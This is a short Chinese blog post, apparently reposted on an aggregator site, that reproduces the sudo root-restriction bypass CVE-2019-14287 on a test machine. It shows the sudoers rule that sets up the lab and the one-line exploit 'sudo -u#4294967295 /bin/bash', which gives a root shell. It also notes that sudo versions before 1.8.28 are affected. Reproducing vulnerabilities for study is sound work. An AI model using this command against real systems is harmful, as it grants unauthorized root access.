首页 > 系统相关 > 详细

(CVE-2019-14287)-linux sudo root 权限绕过漏洞复现

时间：2019-10-15 18:58:08 阅读：105 评论：0 收藏：0 [点我收藏+]

标签：sudoer 测试漏洞复现 user nta root linu ima bsp

1：查看测试机sudo版本号，确认是受影响版本。

技术图片

技术图片
2：创建账号test

技术图片

技术图片
3：进入/etc,备份一下sudoers到/root，然后修改sudoers内容，添加：

test ALL=(ALL,!root) /bin/bash

技术图片

技术图片

4：登录test账号，

技术图片

sudo -u#4294967295 /bin/bash

技术图片

受影响的Sudo版本：

1.8.28之前的Sudo版本会受到影响。

=======================================
参考链接：
https://www.sudo.ws/alerts/minus_1_uid.html
https://mp.weixin.qq.com/s/bb6Hd3JdYiLilqdP_-INtA
https://mp.weixin.qq.com/s/1-WQSiB1Yc_sPYh928TXkw

(CVE-2019-14287)-linux sudo root 权限绕过漏洞复现

标签：sudoer 测试漏洞复现 user nta root linu ima bsp

原文地址：https://www.cnblogs.com/SzSecNote/p/11679345.html

踩

(0)

赞

(0)

举报

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行

更多

友情链接

兰亭集智国之画百度统计站长统计阿里云 chrome插件新版天听网

关于我们 - 联系我们 - 留言反馈

© 2014 mamicode.com 版权所有联系我们:gaon5@hotmail.com

迷上了代码！